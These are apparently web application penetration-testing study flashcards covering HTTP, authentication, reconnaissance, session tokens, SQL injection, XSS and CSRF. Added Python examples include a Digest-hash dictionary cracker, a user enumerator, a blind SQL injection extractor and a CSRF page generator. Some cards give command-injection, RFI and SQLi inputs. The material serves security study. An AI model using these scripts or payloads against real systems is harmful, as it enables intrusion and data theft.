WEB APP Flashcards
What is the difference between a web server and a dynamic server?
A (static) web server just serves files as they sit on disk, whereas a dynamic server can reference a back-end data store and serve active content generated per request. Most modern web applications run on dynamic servers.
What is an application server?
A server referenced by the web/dynamic server that executes the application code; things like WebSphere, JBoss, WebLogic, etc.
What was improved from HTTP 1.0 to 1.1?
Persistent (keep-alive) connections, chunked transfer encoding, better caching support, extension methods, bandwidth optimization, and the mandatory Host header field (which makes name-based virtual hosting possible).
What is “push promise” ?
Server push: a feature of HTTP/2 that lets a web server send a resource (e.g. a stylesheet the page will need) before the client has requested it. The server announces it with a PUSH_PROMISE frame, and the client may reject it.
What is http multiplexing?
A feature of HTTP/2: many requests and responses are carried as independent, interleaved streams over a SINGLE TCP connection, rather than "pipelining" them in strict order through one connection (HTTP/1.1) or opening several connections in parallel.
What moves HTTP to a text-based-on-the-wire type of connection to a binary form?
HTTP/2, which uses binary framing (plus HPACK header compression); this gives better compression and reduces parsing overhead/complexity.
What string in an http request identifies the type of client software used to connect?
User-agent string. Describes the web client.
Where is the web server technology identified in an HTTP exchange?
In the "Server" header of the HTTP response (it is a response field, not a request field; it can be suppressed or faked, so confirm with other fingerprinting).
What is Windows 7/2008 R2 listed as in the user-agent string? Windows 8/2012? Windows 8.1/2012 R2?
"Windows NT 6.1", "Windows NT 6.2", and "Windows NT 6.3" respectively.
What is the difference between GET and POST?
Both send data to the server; GET passes parameters in the URL query string, POST passes them in the request body (payload).
Why is POST more secure than GET?
Parameters aren't part of the URL, so they don't end up in web server or proxy logs, browser history, bookmarks, or Referer headers. Caveat: the POST body is just as readable on the wire (without TLS) and in the client, so POST is not "secure", only less likely to leak.
What echoes an HTTP request as seen by the server back to a client, for diagnostics?
TRACE
What HTTP request asks the server to return the list of request methods it supports? (which can then be used for interchange)
OPTIONS
Method used when accessing an application through a proxy server (tunneling, e.g. HTTPS through an HTTP proxy).
CONNECT
How does a CONNECT request work?
The client connects to the proxy and sends "CONNECT host:port"; the proxy opens a TCP connection to that target and then relays bytes in both directions, so the client can talk to the resource (e.g. complete a TLS handshake) through the tunnel.
What HTTP method is used for WebDAV attacks, and where are those type of systems usually found?
PUT, which lets you upload data to a resource path that you specify (if the server allows it; check the OPTIONS response or just try a PUT to a test file). Found on intranet web servers, occasionally.
“Switching Protocols” HTTP status code
101 (info)
“redirect” HTTP status code
302 (Found, a temporary redirect; 301 is Moved Permanently, 307/308 are the newer temporary/permanent forms)
“Not modified” HTTP status code, and what is it for?
304; used to say that the content hasn’t changed, so the client can continue to use data that has been cached.
"Unauthorized" HTTP status code (credentials required; the WWW-Authenticate response header names the scheme to use)
401
Page not found HTTP status code
404
Server error HTTP status code series
5xx
Websockets were integrated with the __________ technology scheme
HTML5
This protocol establishes a bi-directional comm pipe over a SINGLE tcp socket
websocket
How is a websocket established? How does it work?
The socket is set up from JS/HTML5 code: the client sends an HTTP GET with "Upgrade: websocket", "Connection: Upgrade" and a random Sec-WebSocket-Key; the server answers with a 101 (Switching Protocols) response carrying a Sec-WebSocket-Accept header derived from that key, and from then on the connection carries WebSocket frames using the ws:// or wss:// scheme. The client code typically lives in a .js file, but can be found inline in a script block inside the HTML page itself.
What is method interchange?
When you are able to use a GET in lieu of a POST (or vice versa) and the application still accepts the parameters; useful to an attacker because it moves the data into the URL, where it is easy to put in a link (phishing, CSRF) and where it lands in logs.
_______ authentication uses base64 encoding when passed over the network, and uses a "realm" to identify itself.
Basic
How does basic authentication handle the actual process of authenticating?
The web server handles it, with no application code involved. IIS checks against Windows accounts; Apache checks a password file (created with htpasswd) referenced from httpd.conf or .htaccess.
What are some problems with basic authentication? (Things an attacker will look for)
- No account lockout/max attempts (brute force is easy)
- Auth traffic passed in the clear unless TLS is used (base64 is encoding, not encryption)
- Can easily be replayed (the same header is resent on every request)
- No log-out functionality w/o closing the browser (the browser keeps caching and resending the header)
What is added to basic auth to to improve it in digest auth?
A server-supplied nonce is added and the password is never sent directly: the client sends an MD5 hash computed over the username, realm, password, method, URI and the nonce (the nonce acts like a salt/challenge).
Why is digest auth not much more secure than basic?
Everything except the password (nonce, username, realm, URI and the resulting MD5 response) crosses the wire in the clear, so a sniffer can run an offline dictionary attack against the captured response, and an active man-in-the-middle can rewrite the challenge or downgrade the client to Basic. MD5 is weak and the server is never authenticated.
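The two schemes side by side, as an added example (not from the original flashcards): the Basic header is decoded straight back to the password, and the Digest response (RFC 2617, qop=auth) is recomputed from the fields a sniffer sees to mount the offline dictionary attack the card describes. The user name, realm, nonce and wordlist are constructed values.

```python
import base64
import hashlib


def basic_header(username: str, password: str) -> str:
    """Basic auth: credentials are only base64-encoded, never encrypted."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


def decode_basic(header_value: str) -> tuple:
    """Anyone who sees the header (proxy log, sniffer) recovers the password."""
    # RFC 7617: the user name cannot contain ':', so the first ':' splits user from password.
    user, _, pw = base64.b64decode(header_value.split()[-1]).decode().partition(":")
    return user, pw


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 Digest with qop=auth: response = MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    ha1 = hashlib.md5(f"{username}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}".encode()).hexdigest()


def crack_digest(captured: dict, wordlist):
    """Offline attack: every input except the password was captured in cleartext."""
    for guess in wordlist:
        if digest_response(captured["username"], captured["realm"], guess,
                           captured["method"], captured["uri"], captured["nonce"],
                           captured["nc"], captured["cnonce"], captured["qop"]) == captured["response"]:
            return guess
    return None


# Constructed capture: the fields of an "Authorization: Digest ..." header as a sniffer sees them.
CAPTURE = {
    "username": "alice", "realm": "intranet", "method": "GET", "uri": "/secret",
    "nonce": "dcd98b7102dd2f0e8b11d0f600bfb0c093", "nc": "00000001",
    "cnonce": "0a4f113b", "qop": "auth",
}
# The victim's real password (Winter2014) is only used here to synthesize the captured response.
CAPTURE["response"] = digest_response(CAPTURE["username"], CAPTURE["realm"], "Winter2014",
                                      CAPTURE["method"], CAPTURE["uri"], CAPTURE["nonce"],
                                      CAPTURE["nc"], CAPTURE["cnonce"], CAPTURE["qop"])

WORDLIST = ["password", "letmein", "Summer2014", "Winter2014"]  # constructed

if __name__ == "__main__":
    hdr = basic_header("alice", "Winter2014")
    print(hdr, "->", decode_basic(hdr))
    print("digest cracked:", crack_digest(CAPTURE, WORDLIST))
```

The dictionary attack needs one captured exchange and no further interaction with the server, which is why Digest's lack of lockout does not matter and why only TLS (which also authenticates the server) actually fixes either scheme.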
Integrated Windows auth is perfect for ______ types of attacks
CSRF (and XSS that issues requests): the browser sends the domain credentials (NTLM/Kerberos) automatically, so if you can make a logged-in client browser issue a request, that request reaches the web server authenticated as the victim.
Typically, the authentication in “forms based” auth is handled by
The application itself, checking the submitted credentials against LDAP or a back-end database: the user requests the form, fills it out, and submits it; the application (not the underlying web server) processes the request and either returns an error or the resource, usually issuing a session cookie.
Attack vectors (issues) for forms based auth
- The developer is responsible for implementing proper security controls (lockout, password handling, session management)
- Possible to sniff/intercept tokens/cookies/sessions if they travel without TLS
- Possible to spoof the site (create a phishing attack), since the login form is ordinary HTML
Three parties in an OAuth (1.0 terminology) transaction
User (the person, e.g. @user)
Consumer (the third-party app, e.g. Tweetbot)
Service provider (e.g. Twitter)
Three items exchanged as part of an OAuth transaction
- Request token
- Secret (the consumer secret and the per-token secret, used to sign requests)
- Access token
The consumer signs its request with the secret and sends it to the service provider, which issues a request token; after the user approves, the request token is exchanged for an access token. The access token is returned to the consumer, which uses it for API calls (e.g. to post data) on the user's behalf.
Hackers look for what in OAuth
- Want to find the secret key (due to insecure storage in the consumer app, or interception)
- Highly dependent on the consumer service getting the implementation right (storing/regenerating keys properly)
- Possible to spoof the site and steal the username/password during the authorization step
Difference between OAuth 1.0 and 2.0
- SSL/TLS required for all 2.0 communications (tokens are bearer tokens, so the transport must protect them)
- Signatures not required for API calls once the token is issued in 2.0; possessing the token is enough
- Access tokens in 2.0 expire (refresh tokens obtain new ones)
- Less data exchanged and less cryptographic work in 2.0
SSL/TLS relies on _________ for encryption, which relies on trust with a ____________
PKI (X.509 certificates), certificate authority whose root is in the client's trusted certificate store
When a browser requests an HTTPS page, it receives ______________.
The server's certificate (which contains its public key) plus the chain up to a trusted CA
Heartbleed is a vulnerability in ________ and allows for the attacker to _____________.
OpenSSL (the TLS heartbeat extension, CVE-2014-0160); read up to 64 KB of the server process's memory per heartbeat request, including whatever is resident there (usernames, passwords, session cookies, the server's private key).
Nmap script to check heartbleed
ssl-heartbleed.nse
Five parts of the Sans reporting format
Executive summary, Introduction, Methodology, Findings, Conclusions (optional: Presentation)
Stages of the Sans Web app pen test methodology
Recon
Mapping
Discovery
Exploitation
What is included with WHOIS record?
Identifies the owner/registrant, authoritative name servers, email addresses, phone numbers, and names of technical POCs
What does DIG output that NSLOOKUP does not?
The full raw DNS response (answer/authority/additional sections with TTLs), and it easily requests specific record types: MX, AXFR (zone transfer), ANY, etc.
What is the fierce scanner for?
Designed to find hosts in a domain using DNS queries: it tries a zone transfer, then guesses host names from a wordlist and reverse-looks-up the neighbouring IP ranges it discovers.
What does DNSrecon do?
Collects all of the standard records it can find for the domain, including SRV records (which can point to other services/attack vectors); also attempts zone transfers, brute-forces host names, and does reverse lookups for a range of IP addresses.
To omit a page or pages with specific strings from a google search
Use the "-" operator in front of the term (e.g. site:www.sans.org -handlers)
The google dorks (Google Hacking DB) is a repository of __________ and is found at _________.
Very specific searches, such as those finding webcams with default credentials, directory indexes, and pages with stock passwords.
It can be found at exploit-db.com (the Google Hacking Database section of Exploit-DB).
Operators used in Shodan for finding things:
Filters that find devices based on city, country, geo (lat/long), net (IP range), hostname, os, port, and product
What is the “Google dorks” of Shodan? (The site where you can find legit uses of Shodan)
SHINE (SHodan INtelligence Extraction, www.infracritical.com). Finds things like: medical devices, traffic lights, serial port servers, data radios, webcams/CCTV
Tool that will search all the documents it can find on a site for METADATA (things like users, folders, printers, type of software, etc.)
FOCA (Fingerprinting Organizations with Collected Archives)
Tool that gathers information about domains via PUBLIC information sources (IP addresses, emails, hosts, etc)
theHarvester
3 Tools that can be used to perform server foot printing
Nmap (with the -sV version detection option)
Netcat: connect and grab the banner (i.e., connect, send "HEAD / HTTP/1.0" followed by a blank line, check the Server header in the response)
Netcraft site report/toolbar
Tool used (like Netcat) to perform SSL checks
OpenSSL (with its s_client switches)
Ex: openssl s_client -connect www.testurl.com:443 (add -servername www.testurl.com for SNI; -tls1, -cipher etc. to test specific protocol versions and ciphers)
.NET app that tests the strength of a web application's SSL ciphers
SSLDigger
Free, publicly accessible site for testing the SSL configuration/strength of a publicly facing website. Gives you a nicely formatted output report
Qualys SSL Labs
Easy test for heartbleed
the Nmap heartbleed script: nmap -p 443 --script ssl-heartbleed -oN heartbleed.txt target (ssl-enum-ciphers is a different script that lists supported protocol versions and ciphers)
Two types of virtual hosting
IP based: every host has a unique IP
Name based: every host shares an IP, and requests are routed to the right site using the HTTP "Host" header in the request
Most common form of virtual hosting
Name based, which means all hosts share an IP and requests are multiplexed based on the "Host" request header (so scanning by IP alone misses sites; always send the right Host value)
Internet resource that can detect virtual hosting
Bing: use the ip: operator (ip:1.2.3.4) to see all the host names Bing has indexed on that IP
How to identify load balancers in use
- URL analysis (sans.org vs. www2.sans.org) and timestamps of responses
- Examine the "Last-Modified" and "Date" headers of responses; they drift between back-end servers
- Cookies! Load balancers usually set a cookie on the browser that pins it to the server it first hit (look for "load", "LB" or "balancer" in the cookie name)
- Look for differences in HTTPS: different certificate names or cipher versions between requests
- Look for differences in the comments/source code returned for the same page
Best tool for checking method interchange (seeing which methods a web server accepts)
netcat; just try to send a request with each method (GET, POST, HEAD, OPTIONS, PUT, DELETE, TRACE...) and compare the status codes. Can be easily scripted.
Browser extensions that give you insight into operating systems, web servers, packaged web applications, Languages, frameworks, and APIS for a site that you visit
Netcraft and Wappalyzer
How to get wget to ignore the robots.txt file and download all of a site’s content recursively
wget -r -l 3 -e robots=off http://target/
-r is recursive, -l 3 gives it a recursive depth of 3, and -e robots=off makes it ignore robots.txt
Once you have a site map and have conducted flow charting, the next step to analyzing a web site is:
Relationship Analysis: Shows how the components of a web application relate to each other. Place to look for authentication bypass or authorization bypass.
Why is it important to analyze junctions between code written by two different developers?
Misunderstandings are common; one developer may assume that authentication/authorization is handled by a different part of the app, for example
Also, if you find a vulnerability in one part of the code, you can then move to see if the problem is systemic
Cross-platform Java app that checks to see if pages exist based on a word list
OWASP DirBuster
4 Things used to maintain “session” for a browser
Cookies (USERID)
URL parameters
Hidden form fields
IP/Browser info
Cookies that look like ... are probably ...
- S2V2aW4gSm9obnNvbg== : Base64 (decodes to readable text, here "Kevin Johnson")
- 72b27b1b696ecaadfc0f212f16809850 : md5sum (32 hex characters)
- 655609cdf493495c9f166e6d : hex-encoded output of some hash/crypt routine
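Added example (not from the original flashcards) of the first pass over a batch of collected tokens: guess the encoding from the alphabet and length, decode base64 tokens to see whether they carry plaintext, estimate per-character entropy, and check consecutive hex tokens for a constant delta (a counter in disguise). The three sample tokens are the ones on the card; the "PREDICTABLE" series is constructed.

```python
import base64
import binascii
import math
import re
from collections import Counter
from typing import List, Optional


def classify_token(token: str) -> str:
    """Guess the encoding of a session token from its alphabet and length.
    Hex is checked first: a short all-hex token can also look like valid base64."""
    if re.fullmatch(r"[0-9a-f]{32}", token):
        return "md5-hex (32 hex chars)"
    if re.fullmatch(r"[0-9a-f]{40}", token):
        return "sha1-hex (40 hex chars)"
    if re.fullmatch(r"[0-9a-f]+", token) and len(token) % 2 == 0:
        return "hex"
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token) and len(token) % 4 == 0:
        try:
            base64.b64decode(token, validate=True)
            return "base64"
        except binascii.Error:
            pass
    return "unknown/opaque"


def decode_if_base64(token: str) -> Optional[str]:
    """Base64 tokens often hold plaintext (a user name, an id): decode and look."""
    if classify_token(token) != "base64":
        return None
    try:
        return base64.b64decode(token).decode("ascii")
    except UnicodeDecodeError:
        return None  # binary payload, e.g. an encrypted blob


def shannon_entropy_bits(token: str) -> float:
    """Bits of entropy per character, estimated from character frequencies.
    Hex can reach at most 4.0 bits/char, base64 at most 6.0."""
    counts = Counter(token)
    n = len(token)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def sequential_delta(tokens: List[str]) -> Optional[List[int]]:
    """For hex tokens collected in order: differences between consecutive values.
    A constant delta means the 'random' id is really a counter."""
    if not all(re.fullmatch(r"[0-9a-f]+", t) for t in tokens):
        return None
    values = [int(t, 16) for t in tokens]
    return [b - a for a, b in zip(values, values[1:])]


# Samples from the card (first one with its missing character restored).
SAMPLES = ["S2V2aW4gSm9obnNvbg==", "72b27b1b696ecaadfc0f212f16809850", "655609cdf493495c9f166e6d"]
# Constructed series of three tokens issued one after another by a weak generator.
PREDICTABLE = ["655609cdf493495c9f166e6d", "655609cdf493495c9f166e6e", "655609cdf493495c9f166e6f"]

if __name__ == "__main__":
    for t in SAMPLES:
        print(t, classify_token(t), decode_if_base64(t), round(shannon_entropy_bits(t), 2))
    print("deltas:", sequential_delta(PREDICTABLE))
```

The entropy figure here is per character of the visible string, not of the underlying value: an MD5 of a counter scores as "random" by this measure and is still fully predictable, which is why the card's next step (Burp Sequencer over many samples, plus decoding) matters.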
3 ways to collect session information from a web site
- Manually (repeatedly request, check session tokens)
- Custom scripts
- Burp
Difference between session data passed by GET and POST
GET passes it in the URL; POST passes it through hidden form fields in the request body
(They can also pass it in a cookie, or in an ASP.NET ViewState variable)
How to determine what a specific type of framework/web app uses to store sessions
Look it up: search the framework's documentation (e.g. PHPSESSID, JSESSIONID, ASP.NET_SessionId are documented defaults)
When developers create their own session IDs, they typically use the ____________ to create a token
The client's IP address, often combined with a timestamp or counter; all of which are predictable, so check whether the token changes with your IP and with time.
Burp mode to analyze session tokens
Sequencer: we feed it a request that returns a fresh token (e.g. the response whose Set-Cookie carries the session ID); it collects a large sample and measures the randomness/entropy of the tokens. It reports predictability, not the algorithm used; use Decoder and manual analysis to work out how the token is built.
How to define a python variable (individual and array)
name = "blah and blah"
year = 1980
relics = ["Holy Grail", "Holy Hand Grenade", "Knights"]   # list (mutable); use ( ) for an immutable tuple
How to store a name/value pair in Python
A dictionary, with "name": value pairs inside braces:
knights = {"Lancelot": "The Brave"}
print(knights["Lancelot"])
How to comment in Python
Single line: # comment
Multi line: a triple-quoted string on its own, opened and closed with """ or '''
To define a python function, and then call it
Define: def functionname(parameters): followed by an indented body
Call: functionname() with the required inputs inside the parentheses
How to manipulate a file in Python
open(path, mode) opens the file (use "with open(...) as f:" so it is closed automatically)
read() loads the entire file into one string
readlines() returns the entire file as a list of lines
write() writes a string to the file
close() closes it (not needed inside a "with" block)
Part of Burp suite used to analyze the randomness of session tokens
Burp Sequencer. Checks the entropy, looks for predictability.
Part of burp used to determine the specific way data is encrypted/compressed/encoded
Decoder
Pitchfork fuzzing attack in burp is used if…
Each payload position needs its own payload list, and the lists are advanced in lockstep (position 1 gets item n of list 1 while position 2 gets item n of list 2)
Useful if related injections are needed, e.g. matching username/password pairs
Battering ram fuzzing attack in Burp is used when…
One set of payloads will be injected into multiple positions
Some places to look for errors in a forms page that will let you know if the user account being checked is valid
- HTTP redirects (302) to different locations
- Changes in the URL (e.g. ?err=1 for existing accounts, ?err=2 for nonexistent ones)
- Differences in the size or content of the page returned (use Burp Comparer)
Python script that iterates user accounts based on a word list and tries to dump them into a forms account
User_enum script
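Added example (not the course's user_enum script): the comparison logic behind such a script. A baseline response for a certainly-nonexistent user is compared with each candidate's response on status code, redirect target and body length; the probe is a constructed stand-in for a leaky login form, so the example runs offline. The account names and URL are made up.

```python
from typing import Callable, Dict, List, Tuple

# (status code, response headers, body) as a minimal HTTP response model.
Response = Tuple[int, Dict[str, str], bytes]


def differs(baseline: Response, candidate: Response, length_slack: int = 0) -> List[str]:
    """Explain how a login response differs from the known-bad baseline."""
    reasons = []
    bs, bh, bb = baseline
    cs, ch, cb = candidate
    if cs != bs:
        reasons.append(f"status {bs} -> {cs}")
    if ch.get("Location") != bh.get("Location"):
        reasons.append(f"redirect {bh.get('Location')!r} -> {ch.get('Location')!r}")
    # length_slack absorbs small dynamic differences (timestamps, CSRF tokens)
    if abs(len(cb) - len(bb)) > length_slack:
        reasons.append(f"body length {len(bb)} -> {len(cb)}")
    return reasons


def enumerate_users(probe: Callable[[str], Response], wordlist: List[str],
                    baseline_user: str = "zz_no_such_user_zz") -> Dict[str, List[str]]:
    """Probe each candidate with a bogus password; anything unlike the baseline is interesting."""
    baseline = probe(baseline_user)
    found = {}
    for user in wordlist:
        reasons = differs(baseline, probe(user))
        if reasons:
            found[user] = reasons
    return found


# Constructed stand-in for a leaky login form: valid accounts get "?err=1" and a longer page,
# unknown accounts get "?err=2". A real probe would POST to the login URL with a wrong password.
KNOWN_ACCOUNTS = {"alice", "bob"}


def fake_login_probe(username: str) -> Response:
    if username in KNOWN_ACCOUNTS:
        return 302, {"Location": "/login.php?err=1"}, b"<html>Incorrect password for this account.</html>"
    return 302, {"Location": "/login.php?err=2"}, b"<html>Unknown user.</html>"


if __name__ == "__main__":
    for user, why in enumerate_users(fake_login_probe, ["admin", "alice", "carol", "bob"]).items():
        print(user, why)
```

Before trusting a hit, request the baseline twice: if the application injects a timestamp or anti-CSRF token into the page, the body length moves on its own and length_slack has to be raised (or the comparison restricted to status and redirect).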
Command injection example
Using a DNS lookup form (one that hands the host name to a shell command) to append Linux commands, e.g. "; id", that run on the underlying operating system.
http://multiplicand/index.php?page=http://127.0.0.1/id.txt is an example of….
RFI (remote file inclusion): the page parameter makes the server include and execute a file fetched from a URL.
“Incorrect syntax near’ “ is an error message from a ________ DB
MS SQL
“You have an error in your SQL syntax” is an error message from ________ kinds of DBs
MySQL
To create some database object like a record, table, or stored-procedure use the ______ cmd
CREATE
The __________ clause adds conditions to a SQL query
WHERE
the __________ command deletes data from a SQL DB
DROP removes a whole object (DROP TABLE user_table;); DELETE removes rows (DELETE FROM user_table WHERE id=1;)
All SQL statements end with
; (a semicolon; this is what lets an injected input chain a second statement)
Select a part of the string in a SQL command
SUBSTRING (MySQL/MS SQL; substr() in SQLite and Oracle)
Standard SQL query looks like:
SELECT column(s) FROM table WHERE condition;
How do we use Boolean statements to look for Blind SQL?
We can send a syntactically valid SQL statement whose condition is true or false and watch whether the page changes: same page as normal means the condition evaluated true.
I.e., compare index.php?itemid=1' and 1=1;-- with index.php?itemid=1' and 1=2;-- (the trailing space after -- matters in MySQL)
Python based framework to speed th exploitation of blind SQL injection flaws
BBQSQL: does binary and frequency searches so that each character is recovered in a handful of requests instead of one request per candidate value
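Added example (not BBQSQL and not code from the original flashcards) of the binary-search extraction such tools automate, run against a constructed vulnerable lookup backed by an in-memory SQLite database. The attacker side only sees "page rendered or not"; each character of the target string costs seven true/false probes (a binary search over 0..127) plus one length check. The table names, the itemid parameter and the admin password are all made up.

```python
import sqlite3


def make_vulnerable_app():
    """Constructed target: item lookup that concatenates itemid into SQL (deliberately vulnerable)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items(id INTEGER, name TEXT);
        INSERT INTO items VALUES (1, 'grail');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'Sw0rdfish');
    """)

    def page_exists(itemid: str) -> bool:
        # The only thing the attacker sees: whether the item page rendered or not.
        sql = "SELECT name FROM items WHERE id=" + itemid
        try:
            return db.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False
    return page_exists


class CountingProbe:
    """Wraps a probe so we can count how many requests an extraction costs."""
    def __init__(self, fn):
        self.fn = fn
        self.calls = 0

    def __call__(self, itemid: str) -> bool:
        self.calls += 1
        return self.fn(itemid)


def oracle(page_exists, condition: str) -> bool:
    """Boolean probe: itemid=1 AND (<condition>); the page shows iff the condition is true."""
    return page_exists(f"1 AND ({condition})")


def extract_string(page_exists, subquery: str, max_len: int = 64) -> str:
    """Recover a string one character at a time with a binary search on its code point.
    sqlite's unicode() is MySQL's ASCII(); substr() works in both."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(page_exists, f"length(({subquery}))>={pos}"):
            break
        expr = f"unicode(substr(({subquery}),{pos},1))"
        lo, hi = 0, 127
        while lo < hi:                      # exactly 7 probes for a 128-value range
            mid = (lo + hi) // 2
            if oracle(page_exists, f"{expr}>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    probe = CountingProbe(make_vulnerable_app())
    secret = extract_string(probe, "SELECT password FROM users WHERE username='admin'")
    print(f"recovered {secret!r} in {probe.calls} requests")
```

Against a real target the subquery and the comparison functions follow the back-end dialect (ASCII()/SUBSTRING() on MySQL and MS SQL), and the "page exists" decision is usually a string match on the response body; a time-based variant replaces the visible difference with a SLEEP()/WAITFOR delay when the page looks identical either way.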
A JavaScript “switch” statement is used to
Choose between multiple cases for one value; execution starts at the matching case and continues until a break is encountered (without a break it falls through into the next case).
JavaScript variables are defined by
Loosely (dynamically) typed: var x; or var x = "Sarah"; (the type comes from the value, not the declaration)
A JavaScript "event" is…
Something that happens in the browser and calls a function (a handler), such as "onload" or "onclick" firing when the page loads or an item is clicked, respectively.
What does the “Find_accounts” python script do
Lets you iterate through a word list of last names to see whether /~username pages exist on the site (user home directories).
Things that a script can NOT change in a request and still expect to read the response, because of the same-origin policy
Port, host name, and protocol (scheme); all three must match the page's origin.
Two application filtering methods used to screen XSS traffic
Whitelists (allow only known-good input) and blacklists (block known-bad patterns); blacklists are the ones worth attacking.
THREE methods to bypass input filtering
Encoding (Unicode, hex, URL/HTML entities, etc.)
Using an IMG tag (e.g. with an onerror handler) instead of SCRIPT tags
Case and whitespace variations of the same tag (e.g. <ScRiPt>) when the filter matches literally
Most common way to get a user to actuate reflected XSS
Phishing. (Send them a crafted link)
Is DOM XSS considered reflected or persistent?
Reflected (the payload usually arrives in the URL), with the twist that the server never sees it: the page's own JavaScript writes untrusted DOM data (location.hash, document.URL) into the page.
Most common type of system exploited with DOM-based XSS
Hybrid/Mashup/Analytic systems, where they need to use the URL or other information from another box
What is an “admin” type of persistent XSS flaw?
When you find a stored XSS flaw in content that requires admin approval: it is a way to attack admin users, and it guarantees that a higher-privileged user gets the first look at the payload.
What actually executes a DOM based XSS attack?
The browser; the web page's own JavaScript reads values from the URL (GET parameters, fragment) and writes them into the DOM.
Everything executes within the browser; with a #fragment payload the server never even receives the attack string.
Tool used to test for both XSS and SQLi on the a page.
TamperData (Firefox extension for modifying requests in flight)
Python based script that is used to automate testing for reflected XSS. Attacks a specific URL. Can crawl the site to discover additional points or funnel through a proxy.
XSSsniper
Python XSS discovery tool with a GUI front end that can attempt to find filtering and bypass it. Has "special techniques" to attack things like User-Agent, Referer, cookies, etc.
XSSer
XSS tool that injects a specific string everywhere in the site to see if it will reflect back to the browser
XSScrapy
Two best parts of Burp to check for reflected XSS content
Use Intruder with the Battering Ram attack type, to test multiple positions with one string
Use the "Grep - Payloads" option to search the application responses for that same string (reflection)
Key to CSRF attacks being viable
When transactions on a page use predictable parameters.
Four step process for finding CSRF in an application
- Review the app logic
- Find functions that have predictable parameters and are worth attacking (transfers, password/email changes, user creation)
- Create a page with a link or auto-submitting form that executes that transaction
- Get the victim to open the link while already logged into the app; their browser supplies the session cookie
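The third step above, as an added example (not MonkeyFist and not code from the original flashcards): turn a captured form-encoded request with predictable parameters into the attacker-hosted page, as a POST form that submits itself or an IMG tag for a GET transaction, and triage whether the parameters include anything that looks like an anti-CSRF token. The bank URL and parameters are constructed.

```python
from html import escape
from urllib.parse import parse_qsl, urlencode


def csrf_poc_html(action_url: str, method: str, params: dict, auto_submit: bool = True) -> str:
    """Build an attacker-hosted page that replays the transaction from the victim's browser."""
    if method.upper() == "GET":
        # A GET transaction needs no form: any image load (or link) fires it.
        return f'<img src="{escape(action_url + "?" + urlencode(params), quote=True)}" alt="">'
    inputs = "\n".join(
        f'    <input type="hidden" name="{escape(k, quote=True)}" value="{escape(v, quote=True)}">'
        for k, v in params.items()
    )
    submit = "<script>document.forms[0].submit();</script>" if auto_submit else ""
    return (f'<html><body>\n<form id="csrf" action="{escape(action_url, quote=True)}" method="{method}">\n'
            f"{inputs}\n</form>\n{submit}\n</body></html>")


def poc_from_captured_body(action_url: str, method: str, body: str) -> str:
    """Turn a captured application/x-www-form-urlencoded body into the PoC page."""
    return csrf_poc_html(action_url, method, dict(parse_qsl(body)))


def looks_csrf_protected(params: dict) -> bool:
    """Cheap triage: does the transaction carry a parameter that looks like an anti-CSRF token?
    Its presence is not proof; still check that the server actually validates it."""
    return any(any(w in k.lower() for w in ("token", "csrf", "nonce")) for k in params)


# Constructed capture: the body of a transfer request seen in the proxy.
CAPTURED_BODY = "to=mallory&amount=1000"

if __name__ == "__main__":
    params = dict(parse_qsl(CAPTURED_BODY))
    print("protected?", looks_csrf_protected(params))
    print(poc_from_captured_body("https://bank.test/transfer", "POST", CAPTURED_BODY))
```

The page is only useful if the victim's browser attaches the session cookie to the cross-site request, which is exactly what the SameSite cookie attribute restricts; a Lax or Strict cookie is the first thing to check when the PoC fails.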
Python application that hosts CSRF for testing and lets you automate CSRF attacks
MonkeyFist
The xmlhttp.open() AJAX call establishes
The properties of the request: the method (GET or POST), the URL of the resource being retrieved, and whether it is asynchronous.
It does NOT initiate the request.
xmlhttp.send() does…
Actually sends the request to the URL (with the body as its argument for a POST)
xmlhttp.onreadystatechange does…
Sets which function should be called whenever readyState changes (i.e. as the ready state number increases, this function is called each time)
xmlhttp.readyState does what?
A number, 0-4, that reports the state of the request; the handler can act differently for each ready state.
0 UNSENT (object created), 1 OPENED (open() called), 2 HEADERS_RECEIVED (send() called, status and headers available), 3 LOADING (response body arriving), 4 DONE (response complete)
xmlhttp.responseText does what?
Is the property that contains the body of the response from the server as text (responseXML holds the parsed DOM when the response is XML)
What is a “mash up” Web 2.0 server
A web server that integrates application widgets from multiple other sites to create a “mash-up” of connectivity. May require a proxy capability to work around same-origin restrictions.
What is a proxy mash up feature?
When one application retrieves code from multiple other sites, using xmlhttp requests, and then delivers it to the client
Why mash up application proxy servers can be attacked
If we can change the URL the proxy fetches (it takes a target URL as a GET/POST parameter), we can make it retrieve content from malicious sources, or reach internal hosts and other internet locations from the server's network position (server-side request forgery)
Application for performing android mobile code testing?
Base-androidlabs app, developed by security compass
API file attacks with AJAX is commonly exploited by…
Looking for API functions that are loaded by the page's scripts but NOT used by the current page, and calling them directly for malicious purposes (for example, calling an "add users" function despite not having access to the admin page; the server must authorize each API call, not just the pages)
WHy is it a good idea to find third party API/libraries when mapping source content?
Can use these libraries, which are pre-built and add functionality to a site, to carry out attacks.
Things to look for in source code that call attention to third-party APIs and libraries (such as jQuery or Google Web Toolkit)
script/link SRC attributes pointing at other hosts or CDNs, and the URLs used in XHR requests
What is JSON?
JavaScript Object Notation: a text data format that serves the same purpose as XML but is lighter, and is parsed natively by JavaScript (and by nearly every other language, so it is not tied to JS/Java). It is a tree of objects and arrays, effectively a "flat DB" of records that can be parsed by JS and used to pass large amounts of data.
Why is JSON often vulnerable to information disclosure?
Application developers don't want to filter data both at the server and at the client, so often huge data sets are sent to the client app and then parsed to display only what the browser needs; everything else is still visible in the response.
Book method for injecting JSON content
Prematurely close the string and object you are inside, insert your own JavaScript, and comment the rest of the code out with //
